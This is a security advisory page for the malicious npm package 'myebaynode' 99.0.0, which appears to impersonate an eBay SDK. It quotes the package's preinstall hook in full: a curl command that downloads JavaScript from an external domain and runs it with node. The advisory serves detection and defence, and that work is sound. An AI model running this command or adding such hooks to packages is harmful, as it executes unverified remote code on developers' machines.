myebaynode @99.0.0
Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC
OSV ID
MAL-2026-6296
Ecosystem
npm
Summary
package.json declares a preinstall lifecycle hook that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js , fetching JavaScript from an external, mutable, personal domain and immediately executing it under the installer's user account on npm install . The fetched payload is unpinned (no hash or signature verification), can be changed by the host's owner at any time, and runs with full filesystem and network access of the installing user. The package name 'myebaynode' with description 'Ebay Node Package', version 99.0.0, and minimal metadata (author 'aman', no repository) suggests brand-impersonation intended to lure developers searching for an eBay SDK.
Source: amazon-inspector (12d56c05672731322d45fb9273fb782a6b8042260fb019b2d96c755eed084fc3)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.